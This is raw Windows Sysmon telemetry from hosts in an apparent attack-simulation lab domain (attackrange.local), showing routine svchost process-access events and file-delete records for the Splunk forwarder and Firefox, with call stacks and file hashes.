12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439805Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439804Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439803Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439802Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439801Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439800Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439799Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439798Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439797Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439796Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439795Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439794Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439793Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439792Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439791Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439790Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439789Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439788Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439787Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439786Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.225{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439785Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.066{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439784Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.066{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439820Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:57.913{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD5CD5F7C65ECFED67BD6755ECAA3D3,SHA256=47949A56C580442654D5F01B8F06ABCEE02FE26BDBB1F0B051678CC5827C0EBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291113Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:57.704{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F154587EAA29E39FD7429BF06C192212,SHA256=15D5C5CFB192C97D0BD8A23D404457C64CF695B9B69396C96A8964617B82DFAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439819Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:57.067{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439818Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:57.067{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291114Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:58.706{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FD9D08AD06980EFC2595EEBF0CCA402,SHA256=A7C16094586A8B572B2404C447DDA86996AD337CA7176A46D657355B391F884B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439822Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:58.068{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439821Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:58.068{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291170Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=B50CF628E0082A7840D84D0CBE1CAD48,SHA256=544DF79BCEF9DC8E082021E342C2A1B12CD0B8BDAF3687E0F23785406EDF33AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291169Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=F130C472E963FF3CEED251C65964B927,SHA256=E5D2A5BBE8AA43751EF7F7BC3A817A0963D56272A4C9B6055E60929606186CE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291168Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=5F93E0F827909390D257EBB27C77F392,SHA256=5BCB684F3EE3B2EC2F4945655FBEF281C487399D6BF90451647DB1761715D4C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291167Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=9275B832091D9E3BFE50898A3BE022B5,SHA256=38C52A5435B625083000A054489B95E033F7B352377510DF668CEE749DE5803E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291166Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=8AC8A05028631170937EDA4CF0E0A35A,SHA256=456AB2C0E4E117D62DC529362EB22C725D410098868442729ADE5E4FF0822E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291165Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=7BBA9B83F0F213C5A723209D4C9962CE,SHA256=E1B8E7DEB0F34EEB6BF4D10E47E734A1FE829C365DF360B98646D7E11F2DD4C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291164Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla 